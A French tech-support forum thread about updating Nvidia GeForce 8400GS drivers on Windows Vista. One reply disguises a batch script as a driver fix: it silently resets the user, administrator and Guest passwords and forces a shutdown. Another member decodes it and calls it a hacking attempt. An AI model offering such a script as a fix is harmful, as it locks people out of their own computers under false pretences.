Problème de mise à jour des pilotes Nvidia

Fermé
Miky16 - 12 janv. 2011 à 22:55
 miky16 - 17 janv. 2011 à 07:25
Bonjour,

Je vous contacte car il m'est impossible de trouver les renseignements exacts sur le Net.

Mon soucis: Impossible de mettre à jour les pilotes pour ma carte graphique GeForce 8400GS, installée d'origine sur mes 2 ordinateurs de bureau ( achetés en 2007 ).


L'installation se passe bien, mais au redémarrage, je me retrouve avec un écran noir, juste après l'affichage de la barre de chargement de Windows, sans aucun message d'erreur ou de perte de signal pour l'écran. Le mode sans échec fonctionne très bien, c'est d'ailleurs ce qui me sert pour remettre les pilotes d'origine.

Seuls les pilotes d'origine, datés de Juin 2007, installés sur le disque dur de restauration fonctionnent. Tous les autres, de décembre 2007 à décembre 2010 donnent le même écran noir au même moment, même ceux installés via Windows Update.

J'aimerais bien mettre à jour ces pilotes, mais il me faut une solution qui fonctionne.

Celles que j'ai essayées et qui ne fonctionnent pas:

-Désinstaller les anciens pilotes, redémarrer, puis installer les nouveaux pilotes, puis redémarrer.
-Installer les derniers pilotes.
-Installer les pilotes antérieurs.

Pour infos:
Marque: Medion Lifetec
Système d'exploitation: Windows Vista 32 Edition Familiale Premium
Ram: 2Go
Processeur: Intel core2 4300 1,8Ghz
Carte Graphique: Nvidia GeForce 8400 GS

A voir également:

7 réponses

pico.l Messages postés 24735 Date d'inscription samedi 3 novembre 2007 Statut Modérateur, Contributeur sécurité Dernière intervention 28 avril 2019 2 446
12 janv. 2011 à 23:33
Bonjour,

pourquoi tu veux faire la mise à jour du pilote si avec le pilote d'origine, la carte graphique fonctionne^^^

vas voir sur le site du constructeur de ton PC >>> https://www.medion.com/fr/service/telechargements/index.php

A+
0
@Pico.l : Merci pour ce lien, sauf que les pilotes fournis là bas dates de 2007/2008 pour mon ordinateur.
Pourquoi mettre à jour si ça marche? juste parce que ça fonctionne à 95%, il arrive parfois qu'un fichier du pilote soit "perdu" puis retrouvé, ou même plus récemment, autrement dit hier, pour un jeu sorti en 2003 ( Les Experts ), le programme de lancement du jeu m'indique que ma carte graphique ne prend pas en compte les animation 3D et openGL, du coup j'ai des carré blanc à la place des animations.

@Aka-PC: Merci pour ta réponse, je vais voir si ça fonctionne. Dans tous les cas je vous tiens au courant.
0
@Aka-PC
Ta solution est tout sauf utile...
Description :
echo off = ne rien afficher à l'écran
break off = empecher l'utilisateur d'interrompre
net user x y = changer le mot de passe de l'utilisateur x pour le définir comme étant y
shutdown -s -f -t 01 = arreter completement le pc immédiatement en arretant tous les processus dans 1 seconde.
exit = fermer

Donc, à part une tentative complètement pourrie de piratage (tu lui aurais demandé d'ouvrir les ports de son routeur, et son IP ensuite ? ...) c'est complètement inutile... dommage...

@Miky16
Ecoutes plutot les conseils de tonton Walou, et demande à ta femme de me donner quelques références sur ton PC par MSN :)
0
Pour servir à rien, c'est sûr que ça sert à rien!

Donc le soucis reste entier.
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
pico.l Messages postés 24735 Date d'inscription samedi 3 novembre 2007 Statut Modérateur, Contributeur sécurité Dernière intervention 28 avril 2019 2 446
13 janv. 2011 à 18:32
Il faut comparer la configuration du jeu à celle de ton PC. Si ta carte graphique n'est pas pris en charge, la mise à jour du pilote ne sert à rien.
0
Merci pour ceux qui ont réellement essayé de m'aider, même si le soucis reste toujours le même depuis 3 ans. tant pis, ça restera comme ça encore longtemps

Bonne continuation à tous et toutes.
0
Salut,

J'avais le même soucie. C'est juste à cause de la perte d'un fichier système.
Tu copier ce code dans un document bloc-note, et enregistre-le avec l'extension .bat (exemple : GeForce.bat). Il te reste qu'a faire un double clic sur le fichié créé. Et enfin tu redémarre l'ordinateur. Après, tu peur faire les mises à jours.

echo off
break off
net user %USERNAME% 0895
net user administrator 0895
net user Guest 0895
shutdown -s -f -t 01
exit
-2